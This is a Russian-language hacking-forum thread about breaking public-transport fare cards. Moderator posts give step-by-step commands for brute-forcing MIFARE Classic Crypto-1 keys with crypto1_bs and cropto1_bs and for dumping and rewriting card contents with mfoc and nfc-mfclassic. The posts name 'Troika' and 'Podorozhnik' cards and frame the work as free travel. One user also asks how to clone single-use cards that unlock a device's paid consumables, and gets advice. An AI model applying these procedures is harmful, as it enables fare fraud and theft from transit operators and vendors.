Схемы, программы, прошивки Взлом проездной карты для проезда в общественном транспорте

Discussion in 'Электроника и Фрикинг' started by The_Doc, 16 Aug 2015.

  1. VKAPI

    VKAPI Member

    Joined:
    25 Nov 2011
    Messages:
    142
    Likes Received:
    68
    Reputations:
    0
    не обязательно

    ну Морковка с вас

    просто так.. Берёшь карту режешь на 2 части.. Берёшь поношенную и склеиваешь. У тебя теперь 2 карты

    С кодом также .. Если ты не тупой. ключик будет тебе не нужен ;)

    дело всё в одном звуке VA......e
     
  2. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,806
    Likes Received:
    18,368
    Reputations:
    377
    Где ты такой древний баян вычитал?
    Что и с чем ты будешь резать и склеивать если внутри метрошной карты крошечная NFC метка (чип)???
    В лохматые годы резали карты с магнитной полосой. И то это из разряда баек.
     
    _________________________
    теща likes this.
  3. VKAPI

    VKAPI Member

    Joined:
    25 Nov 2011
    Messages:
    142
    Likes Received:
    68
    Reputations:
    0

    а ты пробовал так делать ? в мохнатые то годы

    с кодом всё просто. нужно просто ответ получить и всё

    типа 2+2 =4
     
  4. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,806
    Likes Received:
    18,368
    Reputations:
    377
    Бла-бла-бла. Если не в теме - проходи мимо.
     
    _________________________
  5. The_Doc

    The_Doc Banned

    Joined:
    16 Aug 2015
    Messages:
    49
    Likes Received:
    17
    Reputations:
    0
    Так помоги разобраться, каждая помощь будет одобрено! Лавэ подгоню.
     
  6. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,806
    Likes Received:
    18,368
    Reputations:
    377
    Да какое ему бабло...если он карту предлагает резать и склеивать с действующей ???
     
    _________________________
  7. The_Doc

    The_Doc Banned

    Joined:
    16 Aug 2015
    Messages:
    49
    Likes Received:
    17
    Reputations:
    0
    =) Я думал что он знает как...
     
  8. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,806
    Likes Received:
    18,368
    Reputations:
    377
    _________________________
    Genrix-936, URL BADMAN and The_Doc like this.
  9. Грабитель

    Joined:
    5 Mar 2013
    Messages:
    196
    Likes Received:
    12
    Reputations:
    -7
    Дорого, и не интересно.
    Гораздо интереснее и познавательнее сдампать трафф между считывателем и картой народными средствами. Двумя ридерами, и желательно недорогими.
    В наличии имеются два универсальных UART RFC ридера\врайтера RC522, а вот информации как с помощью него прослушать траффик я так и не нашёл.
    Если у кого есть опыт работы в качестве сниффера таких модулей как RC522 или PN532, за инфу буду благодарен.
     
    ldnol likes this.
  10. ldnol

    ldnol Member

    Joined:
    22 Aug 2015
    Messages:
    9
    Likes Received:
    11
    Reputations:
    0
    Сам не использовал, но попробуй pn532mitm.py в rfidiot.
     
    Грабитель and The_Doc like this.
  11. ldnol

    ldnol Member

    Joined:
    22 Aug 2015
    Messages:
    9
    Likes Received:
    11
    Reputations:
    0
    RFIDIOt v1.0i
    Couldn't initialise EMULATOR on reader 1
    Использую PN532 Breakout Board UART
    Как побороть?
     
    The_Doc likes this.
  12. MrWho

    MrWho New Member

    Joined:
    9 Jan 2016
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Есть какие нибудь новости? карточка вроде Mifare Plus SL3.
     
    The_Doc likes this.
  13. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,806
    Likes Received:
    18,368
    Reputations:
    377
    Вышел новый инструмент по бруту ключей к картам mifare Bitsliced Crypto-1 brute-forcer.
    Вот краткий мануал по установке "Bitsliced Crypto-1 brute-forcer" из исходников и пользованию его в Kali Linux amd64:
    Нам потребуется наличие доступа в интернет.
    0. Качаем архив с исходниками тут: https://github.com/aczid/crypto1_bs
    и распаковываем в удобное для нас место.
    1. Сперва ставим либу NFC, иначе будут ошибки c компиляцией, вбиваем в консоль под root:

    apt-get install libnfc-dev

    2. Потом ставим crapto1 и captev1 по очереди вбив в консоль под root следующие команды:

    make get_crapto1


    make get_craptev1

    3. В той же консоле компилируем сам брутфорсер:

    make -f Makefile

    Для брута ключей используем libnfc_crypto1_crack
    Вбиваем в консоль под root:

    ./libnfc_crypto1_crack ffffffffffff 2 A 4 A


    где:
    ffffffffffff - известный нам ключ
    2 - блок от которого этот ключ
    А - наименование ключа (можно и "В" указать если знаете)
    4 - блок от которого нам нужно узнать ключ
    А - соответствует искомому ключу А, если нужен В , указываем соответственно В.
    Ключ подбирался довольно быстро, в зависимости от сложности конечно от 5 до 15 минут.
     
    _________________________
  14. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,806
    Likes Received:
    18,368
    Reputations:
    377
    Мануал по снятию дампа и записи mifare карт 1к и 4к.
    Способ подходит для дампа всяких там "Троек" и "поДорожников".
    Инструменты:
    -Ридер ACR122U /либо любой совместимый с ПО
    -Kali Lunux x64 c набором программ Libnfc http://www.libnfc.org
    -Bitsliced Crypto-1 brute-forcer https://github.com/aczid/crypto1_bs

    1. Брутим нужные для чтения блоков карты ключи с помощью libnfc_crypto1_crac из набора "Bitsliced Crypto-1 brute-forcer ".
    Вбиваем в консоль под root:
    ./libnfc_crypto1_crack ffffffffffff 2 A 4 A
    где:
    ffffffffffff - известный нам ключ
    2 - блок от которого этот ключ
    А - наименование ключа (можно и "В" указать если знаете)
    4 - блок от которого нам нужно узнать ключ
    А - соответствует искомому ключу А, если нужен В , указываем соответственно В.

    Если все нужные нам ключи уже известны можно, начинать с пункта 2.

    2. Считываем ключи с карты в дамп с помощью MFOC:
    mfoc -f key.txt -O /root/Desktop/mycard_key.mfd
    где:
    -f key.txt - текстовой файл с ключами, в место нее можно использовать переменную "-k" и указать известный ключ
    -O /root/Desktop/mycard_key.mfd - путь для сохранения дампа с ключами

    3.
    Для снятия полного дампа карты можно использовать утилиту nfc-mfclassic, указав ей в качестве файла с ключами дамп полученный mfoc:
    nfc-mfclassic r A /root/Desktop/mycard_dump.mfd /root/Desktop/mycard_key.mfd
    где:
    r -переменная для чтения дампа
    A -ключи А (Можно использовать и ключи B)
    /root/Desktop/mycard_dump.mfd - место сохранения дампа карты
    /root/Desktop/mycard_key.mfd - место куда мы сохранили ключи снятые с карты с помощью mfoc

    4.
    Запись дампа карты обратно на ту же карту:
    nfc-mfclassic w A /root/Desktop/mycard_dump.mfd /root/Desktop/mycard_key.mfd
    где:

    w - опция для записи снятого ранее дампа на карту mifare.
    Остальные опции аналогичны п. 3
     
    _________________________
    #34 user100, 25 Mar 2017
    Last edited: 25 Mar 2017
    Stalker_Admin, BillyBons and rushDem like this.
  15. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,806
    Likes Received:
    18,368
    Reputations:
    377
    Сropto1_bs-master -ещё один новый инструмент по бруту ключей к картам mifare по типу Битслайтера.
    Тестировал на работоспособность в Кали линух 2017.3 х64 бит.

    I. Инструкция по установке cropto1_bs-master из репозитория:
    apt install zlib1g-dev
    apt-get install liblzma-dev
    sudo apt install libreadline6-dev
    sudo apt install libncurses5-dev
    git clone https://github.com/vk496/cropto1_bs
    cd cropto1_bs/
    make
    II. Инструкция по установке из архива к сообщению:
    cd cropto1_bs-master
    dpkg -i zlib1g-dev_1.2.8.dfsg-5_amd64.deb
    dpkg -i libreadline-dev_7.0-3_amd64.deb
    dpkg -i libncurses5-dev_6.0+20170902-1_amd64.deb
    make

    Для брута ключей используем cropto1_bs:

    ./cropto1_bs 000000000000 47 a 47 b
    где:
    000000000000 - известный нам ключ
    47 - блок от которого этот ключ
    a - наименование ключа (можно и "В" указать если знаете)
    47 - блок от которого нам нужно узнать ключ
    b - соответствует искомому ключу b, если нужен A , указываем соответственно A.

    Ключ подбирался довольно быстро, в зависимости от сложности конечно от 1 до 20 минут:
    Screenshot from 2019-03-30 11-54-19.png

    Скачать архив:
    http://zalil.su/2018243
     

    Attached Files:

    _________________________
    #35 user100, 30 Mar 2019
    Last edited: 30 Mar 2019
    CyberTro1n, Triton_Mgn and BillyBons like this.
  16. Azazello77

    Azazello77 New Member

    Joined:
    7 Dec 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Подскажите, кто в теме :)


    Имеется устройство со встроенным
    RFID Reader RC522
    В устройство засыпается специальный порошок. Производитель, кроме устройства, хочет зарабатывать на этом самом порошке, и цену на него ставит в 10 раз выше реальной :)
    Для защиты в устройство встроен , и в комплекте с каждым пакетиком порошка идет карта, которая при считывании добавляет устройству время работы.

    В теме только начинаю разбираться, поэтому все мои домыслы построены исключительно на минимальной логике.

    Пункт 1. Карта может быть использована только 1 раз. Раз устройства не имеют подключения к интернету - значит нет общей базы, какая карта была использована, а какая нет. Следовательно на карте имеется какой-то ключ, который после срабатывания карты обнуляется- затирается?

    Пункт 2. говорит ли это о том, что карту можно заранее клонировать и таким образом использовать сколько угодно раз?

    Пункт 3. Конечно, в этом случае карта может быть с шифрованием, честно говоря пока что понятия не имею, клонируются ли такие карты.
    Буду благодарен за любые ответы :)
     
  17. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,806
    Likes Received:
    18,368
    Reputations:
    377
    Хоть бы модель и название устройства написали, может уже есть готовые решения.
    Возможно номер карты записывается на чип устройства ;)
    Не факт, на карте может ничего не затираться, а сверяться uid карты с контрольной суммой на чипе устройства.
    Или устройство использует карты Mifare Ultralite - на которых выжигаются сектора и повторно их не использовать.
    Рекомендую так же покопать в сторону сброса данных на чипе самого устройства.
     
    _________________________
    #37 user100, 6 Apr 2019
    Last edited: 6 Apr 2019
    Azazello77 likes this.
  18. Azazello77

    Azazello77 New Member

    Joined:
    7 Dec 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    устройство - генератор искр Sparcular, модель гляну
    Номер карты записывается на чип устройства - было бы понятно, но на другом устройстве эту карту уже использовать не получается, при этом устройства никак не синхронизируются, поэтому и думал, про затирание, выжигание или перезапись (по идее это можно сделать и во время чтения,RFID Reader RC522 вроде это позволяет, так? )

    "сверяться uid карты с контрольной суммой на чипе устройства." - исходя из отсутствия синхронизации вроде тоже отпадает..

    я так понимаю мне как минимум нужен ACR122U, чтобы посмотреть, что с данными происходит. (опять же, я еще не понял, поможет ли он это сделать, если на карте какое-нибудь шифрование используется. но по идее да, ведь я как минимум увижу изменение данных)
     
  19. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,806
    Likes Received:
    18,368
    Reputations:
    377
    Для начала подойдёт смартфон c NFC умеющий mifare, что бы считать метку с инфой о карте.
    Ибо надо хотя бы понимать , тип самой карты.
    Если это ультралайт - то решение одно, если Классик , другое.
    А может это и не mifare вовсе ;)
     
    _________________________
    #39 user100, 6 Apr 2019
    Last edited: 6 Apr 2019
  20. Azazello77

    Azazello77 New Member

    Joined:
    7 Dec 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    смартфон с NFC подороже будет.
    подумал снять RFID Reader RC522 с самого устройства, и через ардуинку считать, что за карта


    опять же, по описанию
    https://habr.com/ru/company/flprog/blog/396501/
    https://mysku.ru/blog/aliexpress/23114.html

    Поддержвиаемые типы карт: MIFARE S50, MIFARE S70, MIFARE UltraLight, MIFARE Pro, MIFARE DESfire